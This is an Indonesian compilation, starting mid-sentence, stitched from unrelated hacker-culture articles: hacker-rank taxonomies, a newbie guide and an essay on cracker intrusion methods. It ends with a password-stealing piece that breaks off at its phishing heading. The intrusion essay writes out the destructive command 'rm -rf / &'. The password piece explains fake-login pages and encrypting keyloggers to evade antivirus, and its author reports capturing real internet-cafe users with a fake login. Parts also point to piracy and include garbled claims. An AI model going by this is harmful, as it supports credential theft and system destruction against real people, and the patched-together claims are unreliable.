tengah malam harus membayar dengan tagihan yang tinggi.

___________________________________________________________________________

Untuk menjadi seorang hacker sejati tidak hanya butuh kemampuan tapi juga semangat juang yang tinggi,
karena itu berjuang dan bersungguh-sungguhlah >!!!!!!!!!!!

Catatan: Artikel ini merupakan saduran dari:
Arturhack’s Weblog dan HACKER STAGES v1.03
r26MAR2000 dari ElfQrin (www.elfqrin.com)

Beberapa bagian dari tulisan asli telah mengalami modifikasi
dan penyesuaian. Beberapa yang kurang tepat juga telah saya
hapus dan saya sesuaikan relatif terhadap pendapat saya
sendiri. Mohon maaf.

Pada dasarnya, setiap pelaku TI atau praktisi hacking itu
sendiri mendefenisikan konsep ‘HACKING’ yang berbeda.
Tidak tertutup kemungkinan untuk terjadi perbedaan pendapat
terhadap konsep yang di makhsud, namun cukup jadikan
perbedaan pendapat sebagai sebuah kekayaan pemikiran.

Dalam perjalanan menuju pendewasaan, perubahan pola pikir dan
kemampuan teknik, setiap manusia yang memasuki wilayah hacking akan
melewati beberapa tingkatan.

1. Pemula
Saya rasa tidak berlebihan untuk menyebut masyarakat pada tingkatan
ini dengan istilah dungu. Mereka hanya memiliki kemampuan teknis
komputer yang rendah dan mengenal hacking dari surat kabar, bahwa
hacker adalah seorang penjahat elektronik.
Bahkan beberapa diantara mereka juga menulis di surat kabar dalam
hal dan konsep yang sama.

2. Lamer
Lamer merupakan sebuah fenomenal awal remaja yang tertarik
mempelajari hacking. Mereka mempunyai kemampuan komputer standar
dan sedikit lebih banyak mendapat informasi.
Mereka mencoba mencari petunjuk serangan praktis. Baik dari e-zine
maupun melalui diskusi IRC (Chatting). Serangan dilakukan dengan
trojan, sebuah remote administration tool yang memberikan akses
terhadap mesin yang telah terinfeksi.
Lamer juga melakukan benyak hal-hal tidak berguna, seperti
tukar-menukar nomor kartu kredit, dan tukar-menukar password
website porno komersial.
Hacker yang kompeten, atau remaja yang berhasil lolos dari
’seleksi alam’ akan melalui masa ini dengan begitu cepat memasuki
wilayah penuh keingintahuan.

3. Wannabe
Wannabe hacker menganggap hacking lebih sebagai philosophy, atau
seni kehidupan. Mereka mulai membaca teknik-teknik hacking dasar
dan melakukan searching (pencarian) dokumen-dokumen hack yang lebih
serius. Wannabe telah menunjukkan antusiasnya dalam hacking dan
mulai meninggalkan dunia lamer yang penuh kebodohan.

4. Larva
Perjalanan penuh perjuangan menjadi kupu-kupu. Larva telah
disibukkan dengan berbagai pertanyaan bagaimana benda-benda
bekerja ? Bagaimana dunia bekerja. Larva adalah step terpenting
dalam pembentukan jati diri hacker. Mereka menemukan cara untuk
membuat eksploits sendiri. Mencoba melakukan penetrasi sistem tanpa
melakukan pengerusakan, karena mereka tahu, pengerusakan sistem
adalah cara termudah bagi mereka (sysadmin dan polisi) untuk
menangkap jejak sang larva.

5. Hacker
Sebuah keindahan, naluri, karunia tuhan terhadap orang-orang
yang berjuang. Akhirnya tingkatan tertinggi dari budaya digital
telah dicapai. Sebuah dunia baru menanti. Dunia hacking !!

Sesunguhnya setiap orang tidak akan tau kapan pastinya ia menjadi
hacker. Sama halnya dengan anda tidak pernah tau pasti kapan anda
tertidur. Hal terpenting adalah terus belajar dan mengembangkan
pengetahuan. Saat anda beristirahat sejenak dan mengenang kembali
.. anda telah menjadi hacker.

Kemampuan spesial.

Hacker dalam tahap pendewasaannya akan mengalami spesialisasi
skil/kemampuan. Mereka akan dikenal sebagai:

1. Wizard
Yaitu seseorang yang memiliki pengetahuan yang begitu banyak
terhadap subyek tertentu.

2. Guru
Seseorang yang tau apapun tehadap subyek tertentu. Mereka
mengetahui fitur-fitur tak terdokumentasi. Trik-trik pengembangan,
dan teknik-teknik mengalahkan keterbatasan – limit -

Hacker sejati mengenal kebodohannya dan terus mengembangkan diri untuk
mengatasi semua kebodohannya. Dan dalam perjalanan itu alam mengadakan
seleksi, siapakah yang mampu bertahan ?

rev:
[1] http://www.ElfQrin.com/docs/HackerStages.html

Hacker yang baik

Ajari saya bagaimana menjadi Hacker yang baik
Menjadi hacker mungkin adalah salah satu cita-cita orang belajar komputer dan internet. Tetapi apa sebenarnya hacking, dan apa saja yang harus dilakukan untuk menjadi seorang hacker yang baik. Tulisan berikut akan memberikan petunjuk langkah per langkah bagaimana anda belajar. Petunjuk ini cocok juga untuk pemakai internet awal untuk bagaimana mencari informasi di Internet, mencari serial number, membaca artikel security serta tata cara bertanya yang baik disuatu forum diskusi.

Setelah membaca artikel ini walaupun anda membatalkan cita-cita anda, menimal anda telah mengerti pekerjaan berat apa yang harus dilakukan oleh seorang yang ingin menjadi hacker.

Akhirnya selamat membaca.

Salam,

Dhey – The Only Dhey

———————————————————— ——————–

The Newbies Guide to the Internet
Originally written on: 7/1/01 revised: 13/1/01
by Clayman

———————————————————— ——————–
Untuk siapa saja tulisan ini

Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Petunjuk ini ditujukan untuk tingkat pemula.

Tolong Beritahukan kepada saya bagaimana menjadi seorang hacker

Oh… tidak. Saya rasa anda terlalu banyak nonton film, atau salah pengertian tentang internet, dan berpikiran bahwa melakukan hacking adalah sangat menarik dan saya rasa hal tersebut adalah wajar saja. Kemudian, anda akan bertanya “Ajari saya bagaimana melakukan hack” atau “Bagaimana saya dapat melakukan hack terhadap situs ini”. Anda adalah seorang yang panas-panas tahi ayam dan pasti akan diabaikan, dan semua orang akan memanggil anda sebagai lamer, dll … dan hal ini juga hal yang wajar saja.

Jadi, moral dari cerita tersebut adalah : Sebelum anda bertanya “bagaimana saya dapat menjadi seorang hacker” adalah anda harus mengetahui pekerjaan berat apa yang harus anda lakukan, apa yang dimaksud dengan hacking, dll. Jadi petunjuk ini adalah langkah-langkah yang akan mengajari anda begaimana untuk belajar akan hal tersebut.
Baiklah, tetapi saya tidak mengerti.. apakah itu lamer dan newbie ?

Secara definisi tidak ada. Oleh karena itu adalah dua kata yang berbeda untuk mereka. Anda bingung tentang siapa itu newbie, lamer atau apa artinya “elite”, “warez d00d”, “script-kiddie” dan “wanna-be”? Mungkin anda tentu saja tidak mengerti apa yang anda baca . Tulisan ini akan menjelaskan hal ini apa ini dan apa itu:

* The Jargon File: http://www.tuxedo.org/~esr/jargon/jargon.html
* Hacker Stages: http://www.elfqrin.com/docs/HackerStages.html

Uhm.. mengapa mereka mengabaikan saya?

Pelajaran 1: Sebelum melakukan posting ke forum tertentu, baca dahulu aturan dan faq forum dari tersebut. Mengapa anda harus? Baiklah, sebagaimana anda ketahui, FAQ adalah singkatan dari frequently asked questions (pertanyaan-pertanyaan yang sering ditanyakan), dan mereka telah bosan akan hal tersebut, kemudian mereka meletakan jawaban di FAQ. Percaya atau tidak, pertanyaan seperti “ajari saya memasuki account hotmail pacar saya” adalah pertanyaan yang paling sering di tanyakan. Maka, jika anda tidak membaca faq, bukan saja anda yang kelihatan seperti idiot, tetapi anda juga menghabiskan waktu orang lain .. maka:

Aturan 1: Baca aturan pada forum. baca FAQ pada forum. Baca dua kali.

Aturan 2: Setelah benar-benar membaca aturan 1, jangan lihat yang lain dekat caps lock.

Ini juga petunjuk yang baik tentang “bagaimana melakukan posting supaya tidak diabaikan” ditulis oleh Raven, baca di www.securitywriters.org

Jadi, bagaimana kira-kira saya mendapatkan jawaban tersebut

Uhmm.. setiap orang tahu tentang yahoo.com, dan hampir setiap orang tahu tentang altavista.com. Jadi internet merupakan suatu jaringan yang sangat BESAR, maka orang menganggap usaha mencari menjadi sesuatu yang penting, sehingga mereka membuat suatu yang disebut dengan SEARCH ENGINES. Jadi, haruskah anda mencari jawan pertanyaan anda sendiri ? Ya anda harus melakukannya. Adalah sangat mungkin pertanyaan yang sama pernah ditanyakan orang lain, dan telah pula dijawab oleh yang lain, jadi gunakanlah search engine untuk pertanyaan seperti “Belajar C++”. Masuk ke google.com, ketik pada kotak pencarian “Belajar C++”. Sebelum belajar bagaimana melakukan pemrograman, anda mesti tahu untuk apa bahasa pemrograman tersebut, jadi carilah “What is C++”. Perhatikan point-point yang ada? Sehingga Anda tidak menyebabkan orang lain melakukan hal yang sama berulang-ulang, melainkan mencari jawaban untuk diri sendiri. Ini merupakan praktek yang baik, jadi anda tidak perlu mencari orang yang dapat menjawab pertanyaan anda, karena sudah pernah ada di Internet, dan anda tinggal mencarinya.

Aturan 3: Gunakan search engine (google.com)
Aturan 4: Gunakan directori (dmoz.org, yahoo.com)

Tetapi situs tersebut tidak memenuhi keinginan saya?

Hmm.. Jika anda mencari search engine yang baik tentang security

* http://astalavista.box.sk

atau security portal yang baik

* http://neworder.box.sk
* http://securityfocus.com
* http://packetstorm.securify.com

Hmm.. Saya tidak suka membaca. Apakah ada saran lain?

Tidak ada. Anda harus banyak membaca. Hal ini adalah keharusan, karena: membaca = ilmu pengetahuan, ilmu pengetahuan = pengertian dan kebijaksanaan. Anda perlu pengertian dan kebijaksanaan untuk menjadi seorang hacker. Sederhananya, jika anda tidak suka membaca, hentikan membaca ini sekarang juga.

Jadi, apa yang anda rekomendasikan saya untuk dibaca?

Saya merekomendasikan anda membaca segala sesuatu yang anda temukan.

* http://neworder.box.sk
* http://blacksun.box.sk
* http://www.securitywriters.org
* http://www.phrack.com
* http://www.elfqrin.com/hack
* http://www.attrition.org — tulisan ini sangat “panjang*

Uhh.. Siapa itu seorang hacker ? Apa itu hacking?

Ohh, mudah.

* Baca essay “Being Hacker” dan “Open Letter to a wannabe hacker” oleh Elf Qrin dari hacking lab essays
* Baca “The Hacker How-to” oleh Eric S. Raymond dari tuxedo.

Sangat menarik, ajari saya bagaimana melakukan hack

Baca hacking faq yang ada disana .. anda tidak membaca url yang telah saya berikan sebelumnya bukan ? Ketika anda mengerti bahwa pertanyaan ini tidak *berarti* banggalah atas diri anda. Jika anda masih melakukan post pertanyaan ini, baca dari awal petunjuk ini.

Bagaimana saya belajar programming?

Anda dapat membaca pada

* http://code.box.sk

untuk mendapatkan ide yang jelas tentang setiap bahasa. Jangan lupa untuk memeriksa tutorial dari “situs lain”. Perlu diketahui bahwa, cara mendownload source-code dan melakukan kompilasi copy/paste TIDAK mengajari anda apa-apa… Jika anda rasa susah mencari source code, pergi ke:

* http://www.sourceforge.net

hal ini akan membuat anda sibuk sesaat.

Ahem, Saya menanyakan serial number dan tidak ada yang menjawab..

Hal ini tidak ada kaitannya dengan security. Ini adalah alasannya, dan anda tidak membaca aturan forum. Memakai software bajakan adalah ilegal, tetapi jika anda ingin memakainya, jangan tanyakan hal tersebut pada forum ‘umum’, jadi cari www.astalavista.com.

Anda punya saran?

Tentu saja.

+ Jangan menjawab kepada orang yang panas-panas tahi ayam karena hanya membuang waktu anda dan mereka.
+ Jangan membuang waktu dengan membaca pesan pada setiap forum. Bacalah beberapa yang berguna saja seperti Slashdot.org
+ Gunakan web board atau irc sebagai pilihan terakhir untuk mendapatkan informasi.
+ Jangan mengunakan scripts / program kecuali anda tahu apa yang anda lakukan.
+ Jangan mengikuti arus, seperti:

* Jangan katakan produk Microsoft tidak baik kecuali anda telah siap untuk menjawab pertanyaan “Mengapa Visual C++ lebih buruk dibandingkan dengan Borland C++ builder?”

* Jangan katakan “Linux lebih baik” jika anda tidak bisa menjawab “mengapa linux lebih baik” disamping open-source, lebih stabil, cepat, dan aman, serta kelihatan lucu.

* Jangan katakan “Menggunakan GUI tidak lebih baik, gunakan saja command line”. Mengetik dengan command tidak membuat l33t. lebih cepat dari pada gui.

* Jangan berkata “Ini [program / cara / script / situs / atau yang lainnya ] lebih baik ” tanpa mencoba yang lain. Bagaimana anda tahu sesuatu lebih baik tanpa mencoba setiap pilihan?

Jangan percaya setiap yang anda baca. Jangan merusak situs web orang lain. Bagaimana perasaan anda jika seseorang bermain-main dengan meletakkan gambar porno sebagai wall paper pada anak komputer anda perempuan anda yang berumur 6 tahun? atau jika hardisk yang berisi data penting anda terformat ?

Hmm, Saya tidak ada waktu…

Tidak ada masalah, menjadi pemakai biasa dapat juga bergembira. Bye bye.

Apakah anda seorang hacker?

Tidak.

Mengapa saya harus percaya sama anda?

Anda tidak perlu percaya sama saya .. atau semua orang yang tidak menanyakan hal tersebut. Jika anda merasa yang anda baca masuk akal, gunakan, jika tidak hanya untuk mengetahuinya.

Artikel Populer IlmuKomputer.Com BBeellaajjaarr MMeennjjaaddii HHaacckkeerr
Onno W. Purbo
onno@indo.net.id
Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.
Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk

1.Artikel Populer IlmuKomputer.Com http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan).

2.Artikel Populer IlmuKomputer.Com 3Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up‘ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm –rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &’.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

ini dibuat sebagai pelajaran dalam memahani siapa hacker sebenarnya.

*Menjadi seorang hacker berarti mendidik anda untuk menjadi rajin dan disiplin dalam mempelajari sesuatu, terutama yang berbau IT.
*Menjadi seorang hacker dapat membuat diri anda menguasai dunia IT dan turut berpartisipasi membantu orang lain yang membutuhkan bantuan anda dalam dunia IT.
*Hacker tidak merusak, tapi membuat sesuatu atau menciptakan. Internet adalah hasil karya brilian hacker. Tanpa hacker, anda tidak mungkin bisa menikmati internet sekarang ini. Situs jejaring sosial/social network seperti Facebook™ adalah hasil karya seorang hacker bernama Mark Zuckenberg.
*Hacker adalah maestro dunia IT. Jangan membuat mereka marah atau tersinggung, walaupun mengontrol emosi adalah bagian terpenting dari seorang hacker, tapi bagaimanapun hacker adalah seorang manusia. Bukan pisau belati. Anda boleh saja bertanya mengenai dunia IT yang tidak anda pahami, tapi sebelum anda bertanya, pastikan untuk mencari jawaban yang ada dari Google.com atau situs search engine lainnya. Bisa juga dengan bertanya kepada teman-teman yang lain.
*Hacker bukan kriminal. Cracker adalah kriminal.
(tapi tidak semua cracker kriminal juga, akan saya jelaskan nanti.)
*Menjadi seorang hacker harus menpunyai tanggung jawab yang besar. Anda (mungkin) bisa saja tetap hidup seperti orang lain dengan normal. Sudahkah anda menonton film-film berbau hacker seperti Live Free or Die hard 4.0 dan Swordfish? Ya, pada umumnya kehidupan seorang hacker seperti itu adanya. Bukan berarti menyeramkan. Sebaiknya anda cari tahu lebih lanjut seperti apa kehidupan seorang hacker.

Hacker mempunyai strata/tingkatan dalam dunianya, seperti (dari pemula sampai professional)
::baca dari bawah ke atas::
*Elite
Ini adalah master-nya para hacker. Beliau sudah menguasai seluk-beluk dunia IT. Istilahnya ‘Malaikat IT’. Mungkin menurut anda, berlebihan istilah tersebut, tapi faktanya memang begitu.
*Semi Elite
SE/Semi Elite adalah level ke 2 dari hacker. Perbedaan dengan elite adalah hampir akan menguasai seluk-beluk dunia IT. Jadi baru 99% pengetahuan dan keterampilannya, kurang 1% saja.
*Script Kiddie
Pada tingkatan ini adalah seseorang yang hanya mahir membuat script-script program dan sejenisnya.
*Lamer
Pada tingkatan ini adalah seseorang yang hanya mampu menggunakan tools yang ada.
Tidak membuat. Hanya bisa memakai.
*Newbie
Tingkatan paling awal dari menjadi seorang hacker. Umumnya belum mengetahui dunia IT secara detil. Hanya mengetahui cara mengoperasikan PC dan browsing just for fun.
Beberapa jenis hacker lainnya:
*Cracker a.k.a Criminal Hacker
Ini adalah jenis hacker yang membelot. Mereka menggunakan keahlian dan pengetahuan yang mereka miliki untuk bertindak jahat. Walaupun kriminal, tidak selamanya mereka jahat. Maksudnya adalah mereka juga bisa membantu negara tempat tinggal mereka untuk menghancurkan serangan cracker dari negara yang menginvasi dunia cyber di mana negara mereka berada.

Cracker dibagi menjadi dua tingkatan, yaitu:
1) Dark-Side
Ini adalah ‘Iblis’nya dunia IT. Kemampuan merusaknya jangan ditanya lagi. Kasus paling mengerikan adalah mereka sanggup merusak database Pentagon ataupun CIA dan FBI. Mungkin masih banyak kasus lainnya.
2) Malicious (berarti merugikan)
Ini adalah ‘dedemit’ dunia IT. Pada level ini, kemampuan merusak mereka belum terlalu parah.
*Phreaker a.k.a Phone Hacker
Hacker ini adalah hacker telekomunikasi atau telepon. Mereka menguasai semua seluk-beluk hacking dunia telekomunikasi. Mengenai tingkatan, belum ada informasi yang mendukung.
*Carder a.k.a Card Hacker
Hacker ini adalah hacker kartu/card hacker. Mereka menguasai semua seluk-beluk hacking dunia kartu seperti kartu kredit dsj. Mengenai tingkatan, belum ada informasi yang mendukung.
*Defacer a.k.a Deface Hacker
Hacker ini adalah hacker ‘deface’. Mereka menguasai semua seluk-beluk untuk deface/merubah tampilan suatu atau semua situs. Mengenai tingkatan, belum ada informasi yang mendukung.

Umumnya hacker sudah menguasai poin-poin di atas. Tapi mereka menggunakannya untuk tujuan belajar. Bukan merusak.

Ciri-ciri bila anda mempunyai bakat untuk menjadi seorang hacker:
*Anda mencintai dunia IT.
*Anda cepat dalam menanggapi algoritma pemograman dan belajar bahasa pemograman dan bahasa mesin.
*Anda hobi bermain puzzle, catur, IQ cube/IQ block, game-game strategi, dan action.
*Anda pandai dalam memanipulasi sistem PC anda dan memanipulasi pikiran orang lain.
*Anda dapat mengontrol emosi anda bahkan keadaan yang paling kritis.
*Anda menyukai aliran/genre musik yang ‘tidak biasa’ seperti musik-musik hybrid layaknya Nu Metal, Industrial Metal, Party, Techno dsj. Dikatakan orang-orang yang menyukai jenis musik seperti itu menstimulasi sisi kerja otak kiri dan kanan secara balance/seimbang. Hal ini dibutuhkan untuk menjadi seorang hacker, karena hacker selain bagus dalam IQ juga harus bagus dalam EQ.
*Anda berbeda dalam memandang hidup dibandingkan orang lain.

Mencuri password atau yang sering dikenal dalam istilah inggrisnya “password stealing” begitu mudah dilakukan bahkan untuk orang awam sekalipun. Beribu-ribu cara dapat kita jumpai di internet. Pada artikel ini saya akan mencoba memberikan cara-cara yang bisa dilakukan oleh orang awam sekalipun dalam melakukan password stealing. Sebelumnya ARTIKEL INI TIDAK MENGAJARKAN, HANYA MENGINFORMASIKAN KEPADA ANDA AGAR ANDA LEBIH WASPADA.
Cara pertama ialah :

FAKE LOGIN
Cara ini memang sudah sangat membumi dikalangan remaja penggiat situs jejaring sosial, Fake login terkenal dengan keampuhan dan kepraktisannya (itu alasannya kenapa saya meletakkan pada posisi pertama). Untuk mencari caranya anda bisa googling dengan keyword ‘cara membuat Fake login’ di sertai nama situs jejaringnya. Misalnya friendster atau facebook. Dengan segera google mengantarkan anda ke ribuan informasi cara pembuatan fake login yang terutama berasal dari blog. Keampuhan fake login tak perlu diragukan lagi, sampai saat tulisan ini di publish korban fake login masih terus bertambah dan bertambah. Untuk itu saya mencoba untuk mengobservasi dengan membuat fake login suatu jejaring sosial, saya menargetkan satu komputer di sebuah warnet lalu saya buat agar saat browser dibuka maka akan muncul fake login saya. Ternyata yang menjadi korban cukup banyak. Suatu hasil yang mengejutkan. Padahal ini dilakukan di warnet yang pengunjungnya rata-rata para mahasiswa yang notabene orang-orang berpendidikan. Apalagi kampusnya terkenal dengan ilmu komputer yang bagus, Namun masih mudah dijebak oleh teknik rendahan seperti yang saya lakukan ini. Cara pencegahannya cukup mudah yaitu dengan membuat sebuah file di Microsoft Word buat tulisan untuk link anda ke situs-situs yang akan anda buka pada saat anda memakai komputer publik (mis:warnet), lalu save dengan ekstensi html di dalama flashdisk, sehingga pada saat anda ingin menggunakan browser anda cukup membuka file yang berisi link anda tadi secara otomatis browser pun ikut terbuka tanpa membuka homepage yang seharusnya muncul pada saat pertama kali membuka bowser

KEYLOGGING
Keylogging merupakan cara hacking yang mudah, mungki hambatannya hanya antivirus, metodenya dengan cara menanamkan software keylogger ke dalam suatu komputer, bisa dilakukan secara langsung ataupun melalui Social enginering. Cara Social enginering lebih sulit daripada langsung, karena tidak langsung terhubung langsung dengan komputer tersebut dan tak mengetahui bagaimana pengamanan komputernya dan antivirus yang dipakai, biasanya hacker menenkripsi key logger agar tak terdeteksi oleh antivirus, melakukan enkripsi juga mudah, ratusan software encriptor dapat di download melalui internet secara Free.

PHISING
